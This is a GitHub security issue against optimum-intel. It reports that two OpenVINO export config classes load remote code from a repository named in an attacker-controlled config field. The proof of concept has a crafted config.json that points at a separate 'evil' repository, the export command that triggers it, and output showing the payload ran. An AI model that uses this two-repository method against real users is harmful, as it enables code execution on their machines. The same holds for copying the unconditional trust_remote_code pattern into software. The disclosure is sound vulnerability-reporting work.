Remote Code Execution via LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig

## Description

There is a remote code execution vulnerability in `optimum-intel` during OpenVINO export of multimodal models. The issue is in `LlavaQwen2OpenVINOConfig` and `Phi3VisionOpenVINOConfig`, which unconditionally call `AutoConfig.from_pretrained(..., trust_remote_code=True)` on the repository specified by `config.mm_vision_tower` and `config.img_processor["model_name"]`.

At first glance this may look acceptable because the real `llava-qwen2/phi3_v` architecture normally requires custom remote code. However, this assumption is unsafe. Take `LlavaQwen2OpenVINOConfig` as an example, an attacker can publish a seemingly normal model repository, set `export_model_type` to `llava-qwen2`, and control the `mm_vision_tower` field in `config.json` so that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command, `optimum-intel` initializes `LlavaQwen2OpenVINOConfig`, fetches the attacker-controlled backend config with `trust_remote_code=True`, and executes remote code.

This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted `config.json`, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.

This issue can be triggered through the standard `optimum-cli export openvino` workflow. That makes the attack practical for normal users who are simply trying to convert a model, without realizing that the export step itself can execute attacker-controlled code.

## Root Cause

The vulnerable code is:

https://github.com/huggingface/optimum-intel/blob/e17aa5a3b65991c9b29c8ffef710b5b5f3807a63/optimum/exporters/openvino/model_configs.py#L2187-L2192

and 

https://github.com/huggingface/optimum-intel/blob/e17aa5a3b65991c9b29c8ffef710b5b5f3807a63/optimum/exporters/openvino/model_configs.py#L3079-L3083

The export path also allows attacker-controlled models to reach this class:

```python
if hasattr(model.config, "export_model_type"):
    model_type = model.config.export_model_type
else:
    model_type = model.config.model_type

submodel_paths = export_from_model(
    model=model,
    output=output,
    task=task,
    ov_config=ov_config,
    stateful=stateful,
    model_kwargs=model_kwargs,
    custom_export_configs=custom_export_configs,
    fn_get_submodels=fn_get_submodels,
    preprocessors=preprocessors,
    device=device,
    trust_remote_code=trust_remote_code,
    patch_16bit_model=patch_16bit,
    **kwargs_shapes,
)
```

## Proof of Concept

I created two Hugging Face repositories for demonstration.

The frontend repository, `XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign`, contains a crafted `config.json`:

```json
{
  "model_type": "llava",
  "export_model_type": "llava-qwen2",
  "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}
```

The backend repository, `XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil`, contains attacker-controlled code that will be loaded through `AutoConfig.from_pretrained(..., trust_remote_code=True)`.

Then run the normal export command:

```bash
optimum-cli export openvino \
  --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \
  --task image-text-to-text \
  ./tmpdir
```

During export, `optimum-intel` reads the frontend model config, sees `export_model_type: "llava-qwen2"`, and initializes `LlavaQwen2OpenVINOConfig`. Inside that class, it executes:

```python
AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
```

Since `mm_vision_tower` points to the attacker-controlled backend repository, i.e., `XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil`, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.


```bash
$ optimum-cli export openvino --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign  --task image-text-to-text  ./tmpdir 
Execute Malicious Payload!!!                                                                                       
Execute Malicious Payload!!!                                                                                       
Execute Malicious Payload!!! 
```

	self._behavior = behavior
	self._orig_config = config
	if self._behavior == VLMConfigBehavior.VISION_EMBEDDINGS:
	config = AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
	if hasattr(config, "vision_config"):
	config = config.vision_config

	if self._behavior == Phi3VisionConfigBehavior.VISION_EMBEDDINGS and hasattr(config, "img_processor"):
	self._config = AutoConfig.from_pretrained(
	config.img_processor["model_name"], trust_remote_code=True
	).vision_config
	self._normalized_config = self.NORMALIZED_CONFIG_CLASS(self._config)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Remote Code Execution via LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig #1668

Description

Root Cause

Proof of Concept

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Remote Code Execution via LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig #1668

Description

Description

Root Cause

Proof of Concept

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions